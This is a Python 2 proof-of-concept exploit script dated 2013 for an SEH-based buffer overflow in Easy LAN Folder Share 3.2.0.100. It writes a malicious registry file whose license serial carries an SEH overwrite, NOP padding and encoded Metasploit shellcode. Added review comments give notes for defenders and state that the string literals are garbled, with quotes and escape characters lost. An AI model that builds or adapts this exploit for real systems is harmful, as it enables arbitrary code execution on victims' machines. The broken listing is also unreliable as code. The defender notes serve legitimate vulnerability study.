
# Title : Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Exploit (SEH)
# Published : 2013-08-03
# Author :


#!/usr/bin/python

# ==========================================================================================
# Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability (SEH)
# Date: 2013-08-03
# Exploit Author: sagi-
# Original Bug Found By: ariarat
# Vendor Homepage: http://www.mostgear.com
# Software Link: http://download.cnet.com/Easy-LAN-Folder-Share/3000-2085_4-10909166.html
# Version: 3.2.0.100
# Tested On: Windows XP Professional SP2 & SP3 (ENG)
# ==========================================================================================
# The registration code field in the 'activate license' window is vulnerable to a buffer overflow. 
# This script generates a malicious registry file. 
# Once the generated file has been loaded into the registry, execute the application as normal.
# ==========================================================================================
# Greetz: corelanc0d3r, g0tmi1k
# ==========================================================================================

# Builds "exploit.reg": a .reg file whose License\Serial value is a 2000-byte
# string laid out as filler + SEH overwrite + NOP padding + shellcode, per the
# header above (registration-code field overflow, SEH-based).
#
# NOTE(review): as extracted, this listing is garbled — the string literals on
# the header/junk/nseh/seh/shellcode lines contain unbalanced quotes and lost
# escape characters and do not parse as Python; read the byte values below as
# an illustration of the layout, not as a runnable artefact.
#
# Defender notes (what this PoC implies for detection and mitigation):
#   * The only host-side artefact it produces is a registry import that writes
#     an abnormally long (2000-char) "Serial" string under the MostGear
#     EasyLanFolderShare_V1\License key; length-anomaly monitoring on that
#     value, or on .reg imports touching that key, is the detection point.
#   * The key is under HKEY_LOCAL_MACHINE, so loading the file is presumably a
#     privileged step on the host (writing HKLM normally needs admin rights —
#     confirm for the target OS); the application then evidently reads the
#     value back as a trusted license string without bounding its length.
#   * The chain rests on one hard-coded handler address ("pop pop ret") and is
#     stated as tested only on Windows XP SP2/SP3; SafeSEH handler validation,
#     DEP or ASLR on later builds would be expected to break it.

# .reg preamble: the key path and the fixed-format license values that precede
# the oversized "Serial" entry (path separators appear lost in extraction).
header  = "Windows Registry Editor Version 5.00nn"
header += "[HKEY_LOCAL_MACHINESOFTWAREMostGearEasyLanFolderShare_V1License]n"
header += ""BeginDate"="8/2/2013"n"
header += ""ExpireDate"="8/17/2013"n"
header += ""UserName"="a"n"
header += ""Serial"=""

# Overflow layout, in the order it lands in the Serial value.
junk = "x41" * 550                 # filler up to the SEH record
nseh = "xEBx27x90x90" # jmp short 0x29 -- overwrites the "next SEH" pointer
seh  = "xEFx03xFCx7F" # pop pop ret -- overwrites the handler pointer; NOTE(review): presumably a non-SafeSEH module address valid only on the XP builds listed above, the fragile part of the chain
padding = "x90" * 33     # Required as some random characters appear on the stack

#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_upper -t c
#[*] x86/alpha_upper succeeded with size 469 (iteration=1)
# Payload: Metasploit windows/exec launching calc.exe (a benign demonstrator),
# alpha_upper-encoded so that, after the short decoder stub, the bytes are
# printable upper-case letters and digits — consistent with the value being
# stored and read back as text (inferred from the encoder choice; confirm).
shellcode = (
"x89xe2xd9xf6xd9x72xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx5ax48x4bx39x33x30"
"x43x30x53x30x35x30x4cx49x4bx55x46x51x38x52x43"
"x54x4cx4bx30x52x56x50x4cx4bx36x32x44x4cx4cx4b"
"x36x32x54x54x4cx4bx33x42x47x58x54x4fx4fx47x50"
"x4ax46x46x56x51x4bx4fx36x51x59x50x4ex4cx37x4c"
"x55x31x43x4cx43x32x36x4cx51x30x49x51x48x4fx34"
"x4dx43x31x48x47x4ax42x4ax50x36x32x50x57x4cx4b"
"x50x52x44x50x4cx4bx47x32x37x4cx43x31x48x50x4c"
"x4bx57x30x44x38x4cx45x59x50x44x34x31x5ax53x31"
"x4ex30x50x50x4cx4bx50x48x32x38x4cx4bx36x38x37"
"x50x55x51x48x53x4ax43x47x4cx47x39x4cx4bx50x34"
"x4cx4bx35x51x48x56x46x51x4bx4fx56x51x59x50x4e"
"x4cx39x51x58x4fx44x4dx35x51x49x57x50x38x4dx30"
"x34x35x4cx34x35x53x43x4dx4cx38x37x4bx33x4dx46"
"x44x44x35x4ax42x51x48x4cx4bx56x38x36x44x43x31"
"x39x43x33x56x4cx4bx44x4cx30x4bx4cx4bx30x58x45"
"x4cx35x51x4ex33x4cx4bx33x34x4cx4bx55x51x4ex30"
"x4dx59x57x34x46x44x47x54x51x4bx31x4bx53x51x46"
"x39x50x5ax56x31x4bx4fx4dx30x31x48x51x4fx30x5a"
"x4cx4bx32x32x4ax4bx4cx46x51x4dx42x4ax53x31x4c"
"x4dx4cx45x58x39x55x50x43x30x45x50x30x50x42x48"
"x56x51x4cx4bx52x4fx4dx57x4bx4fx48x55x4fx4bx4b"
"x4ex44x4ex36x52x4ax4ax43x58x39x36x4dx45x4fx4d"
"x4dx4dx4bx4fx4ex35x57x4cx55x56x53x4cx34x4ax4d"
"x50x4bx4bx4dx30x32x55x33x35x4fx4bx51x57x52x33"
"x32x52x32x4fx32x4ax43x30x31x43x4bx4fx39x45x35"
"x33x45x31x42x4cx35x33x46x4ex42x45x33x48x42x45"
"x33x30x41x41"
)

# NOP-pad the value up to exactly 2000 characters, then close the quoted value
# and end the file — every generated file therefore has the same fixed
# "Serial" length, which is what a length-based detection can key on.
trailer = "x90" * (2000 - len(junk + nseh + seh + padding + shellcode)) + ""nn"
buffer = header + junk + nseh + seh + padding + shellcode + trailer

# Written into the current working directory; Python 2 open/close idiom (no
# `with`), matching the Python 2 print statement below.
textfile = open("exploit.reg" , 'w')
textfile.write(buffer)
textfile.close()

print "[*] Done"